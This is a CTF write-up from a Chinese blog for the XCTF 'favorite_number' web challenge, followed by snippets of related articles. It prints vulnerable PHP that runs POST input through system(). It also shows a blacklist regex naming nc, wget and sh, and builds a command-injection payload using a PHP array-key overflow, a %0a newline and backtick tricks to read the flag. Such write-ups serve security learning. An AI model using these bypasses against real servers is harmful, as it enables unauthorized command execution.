(攻防sj)web -favorite_number

最新推荐文章于 2022-01-15 15:32:24 发布
最新推荐文章于 2022-01-15 15:32:24 发布
阅读量144 收藏 1
点赞数 1
分类专栏: 攻防sj
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45344309/article/details/112407464
版权

在这里插入图片描述
打开如下
在这里插入图片描述
得到源码

 <?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

读码明白
1.用post请求页面响应
2.要求 stuff数组 与array相等,且,首字符串不可为admin
3.要求num 数字数组 且,对于正则表达式
i :不区分大消息 m:多行匹配 换行检测
4.匹配屏蔽了括号内这些关键词

首先,对于数组,利用
PHP5.5.9整型溢出溢出漏洞,stuff[2^32]=stuff[0]
得到

stuff[4294967296]=admin&stuff[1]=user

对于换行检测
利用URL 换行符 %0a
后面就可以放命令了
显示命令有以下在这里插入图片描述
cat被屏蔽了,可以用tac
flag被屏蔽了,可以在利用反引号``
在这里插入图片描述
最终构造payload

stuff[4294967296]=admin&stuff[1]=user&num=1%0atac+/f``lag

在这里插入图片描述
得到
在这里插入图片描述
成功

墨明丿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf攻防世界 Web高手进阶区 favorite_number
l8947943的博客
12-29 930
作为一个新手,一路走来,人都麻了,就当积累知识点了! 1. 进入到题目场景,看到代码,因此想到代码审计 2.尝试分析代码 <?php //php5.5.9 $stuff = $_POST["stuff"]; // 接收POST传过的参数,key为"stuff" $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { // stuff的参数要与array恒等,且stuff数组第一个参数不能
XCTF favorite_number wp
weixin_45253216的博客
01-14 692
网安菜鸡今天来划水了! CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 题解: 首先打开题目环境,是一种比较熟悉的格式,页面显示一段php源码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num=
攻防世界 Web高手进阶区 favorite_number
feng的博客
12-21 887
知识点 PHP的数组key溢出。 PHP的preg_match的/m绕过。 命令执行绕过。 WP 昨天偶然翻自己的收藏夹,突然翻到了攻防世界,差点忘了攻防世界的web还没刷完。。就回来稍微看了个题目,还是挺有意思的,不过我也没能完全独立做出来,前两个点都遇到了问题,反而是最后的命令执行做的比较轻松。 首先进入环境,审一下代码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $
从一道题看数组的key溢出问题
qq_45951598的博客
12-05 1236
<?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { //个判断,既要数组强等于,又要首元素不等 $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ // i不区分大小写 // m使边.
攻防世界 web高手进阶区 9分题 favorite_number
闵行小鱼塘
10-29 4248
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是favorite_number的writeup
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
【网络攻防课程seed-labs实验-Web_XSS_Elgg.zip】是一个针对网络安全学习的实验,主要关注Web应用程序中的跨站脚本(XSS)攻击。XSS是一种常见的网络攻击方式,攻击者通过在网页中注入恶意脚本,使用户在不知情的...
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
06-01
《网络攻防课程:深入解析Web SQL注入》 在网络安全领域,Web应用安全是一个至关重要的环节,其中SQL注入(SQL Injection)是常见的攻击手段之一。本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在...
网络攻防课程seed-labs实验-DNS_Attacks.zip
06-01
《网络攻防课程中的DNS Attacks探索》 在网络安全领域,DNS(Domain Name System)攻击是常见且极具破坏性的一种方式。本次"网络攻防课程seed-labs实验-DNS_Attacks.zip"旨在通过实践操作,帮助学生深入理解DNS系统...
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
06-01
《网络攻防课程:深入理解Buffer Overflow Server》 在网络安全领域,Buffer Overflow是经典且重要的攻击手段之一。这个实验——“Buffer Overflow Server”,是网络攻防课程中的一个关键环节,旨在帮助学生理解并...
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip
06-01
《网络攻防课程seed-labs实验-Sniffing_Spoofing.zip》是一个与网络安全相关的实验,主要聚焦在嗅探(Sniffing)和欺骗(Spoofing)这两个关键概念上。这两个技术是网络攻防领域的重要组成部分,理解和掌握它们对于...
perl 正则匹配多个
zhaoyangjian724的专栏
12-06 5020
Vsftp:/root# cat k1.pl my $_='upDaTe'; if( $_ =~ /^(SELECT|UPDATE|DELETE|INSERT|SET|COMMIT|ROLLBACK|CREATE|DROP|ALTER|CALL)/i){print "1111111111111\n";}; Vsftp:/root# perl k1.pl 1111111111111
XCTF-攻防世界CTF平台-Web类——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过)
Onlyone_1314的博客
01-15 3622
目录标题方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开题目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4544
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
PHP, Perl, Python, Ruby 语言特性的区别
HYHOLINE的专栏
03-02 3951
Interpreted Languages: PHP, Perl, Python, Ruby (Sheet One) a side-by-side reference sheet sheet one: arithmetic and logic | strings | regexes | dates and time | arrays | dictionaries | functions
攻防世界Webfavorite_number
Light_inthe_eyes的博客
10-16 160
打开页面,发现一串代码,代码审计: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python
preg_match的用法
weixin_34384681的博客
12-13 201
preg_match 利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football";if (preg_match('/foo/', $string)) {// 匹配正确} 上面的例子...
攻防世界: web favorite-number
Zeker62的博客
09-06 168
目录题目剖析漏洞分析注入payload题目剖析 这是一道PHP代码审计题目 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if...
攻防世界-favorite number
xixihahawuwu的博客
11-23 1600
一道web题 题目并没有给我们有用的提示信息 进入环境 这个应该是网页的源码 开始代码审计 我们可以很明显的看到一个麻烦的东西 if($stuff === $array && $stuff[0] != ‘admin’) { 这里即要求一个强等于,还要求首元素要不一样 然后是一个正则,还有一个黑名单 第一个应该要从php5.5.9自身的漏洞入手,去查查资料 问题出在php中key数组的溢出 https://segmentfault.com/q/1010000003871264 这个链接是
preg_match用法
senlin1202的博客
03-04 1788
preg_match 利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football"; if (preg_match('/foo/', $string)) { // 匹配正确 }
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值